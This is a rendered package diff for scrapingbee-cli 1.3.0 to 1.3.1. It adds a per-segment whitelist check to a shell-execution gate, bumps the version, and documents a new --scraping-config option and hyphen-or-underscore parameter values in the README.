segments = _split_shell_segments(cmd_stripped)
|
|
109
|
+
if not segments:
|
|
110
|
+
return False
|
|
111
|
+
return all(_is_single_segment_whitelisted(seg) for seg in segments)
|
|
112
|
+
|
|
113
|
+
|
|
71
114
|
def require_exec(feature_name: str, cmd: str | None = None) -> None:
|
|
72
115
|
"""Gate check — call before any shell execution.
|
|
73
116
|
|
|
74
117
|
Required: SCRAPINGBEE_ALLOW_EXEC=1 + SCRAPINGBEE_UNSAFE_VERIFIED=1
|
|
75
118
|
Optional: SCRAPINGBEE_ALLOWED_COMMANDS — if set, command must match whitelist.
|
|
119
|
+
Blocks shell injection patterns (pipes to non-whitelisted commands,
|
|
120
|
+
command substitution, backticks, process substitution).
|
|
76
121
|
"""
|
|
77
122
|
if not is_exec_enabled():
|
|
78
123
|
click.echo(_VAGUE_ERROR, err=True)
|
|
@@ -81,7 +126,7 @@ def require_exec(feature_name: str, cmd: str | None = None) -> None:
|
|
|
81
126
|
# Whitelist is optional — if set, enforce it
|
|
82
127
|
if cmd is not None and is_whitelist_enabled() and not is_command_whitelisted(cmd):
|
|
83
128
|
click.echo(
|
|
84
|
-
|
|
129
|
+
"Command blocked: contains non-whitelisted command or shell injection pattern.",
|
|
85
130
|
err=True,
|
|
86
131
|
)
|
|
87
132
|
raise SystemExit(1)
|
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
Metadata-Version: 2.4
|
|
2
2
|
Name: scrapingbee-cli
|
|
3
|
-
Version: 1.3.
|
|
3
|
+
Version: 1.3.1
|
|
4
4
|
Summary: Command-line client for the ScrapingBee API: scrape pages (single or batch), crawl sites, check usage/credits, and use Google Search, Fast Search, Amazon, Walmart, YouTube, and ChatGPT from the terminal.
|
|
5
5
|
Author: ScrapingBee
|
|
6
6
|
License-Expression: MIT
|
|
@@ -81,7 +81,9 @@ scrapingbee [command] [arguments] [options]
|
|
|
81
81
|
- **`scrapingbee --help`** – List all commands.
|
|
82
82
|
- **`scrapingbee [command] --help`** – Options and parameters for that command.
|
|
83
83
|
|
|
84
|
-
**Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
|
|
84
|
+
**Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, `--scraping-config`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
|
|
85
|
+
|
|
86
|
+
**Parameter values:** Choice parameters accept both hyphens and underscores interchangeably (e.g. `--sort-by price-low` and `--sort-by price_low` both work).
|
|
85
87
|
|
|
86
88
|
### Commands
|
|
87
89
|
|
|
@@ -117,6 +119,7 @@ scrapingbee [command] [arguments] [options]
|
|
|
117
119
|
- **Scheduling:** `scrapingbee schedule --every 1d --name prices scrape --input-file products.csv --update-csv` registers a cron job. Use `--list`, `--stop NAME`, or `--stop all`.
|
|
118
120
|
- **Deduplication & sampling:** `--deduplicate` removes duplicate URLs; `--sample 100` processes only 100 random items.
|
|
119
121
|
- **RAG chunking:** `scrape --chunk-size 500 --chunk-overlap 50 --return-page-markdown true` outputs NDJSON chunks ready for vector DB ingestion.
|
|
122
|
+
- **Scraping configurations:** `--scraping-config "My-Config"` applies a pre-saved configuration from your ScrapingBee dashboard. Inline options override config settings. Create configurations in the [request builder](https://app.scrapingbee.com/).
|
|
120
123
|
|
|
121
124
|
### Examples
|
|
122
125
|
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
{scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/dependency_links.txt
RENAMED
|
File without changes
|
{scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/entry_points.txt
RENAMED
|
File without changes
|
|
File without changes
|
|
File without changes
|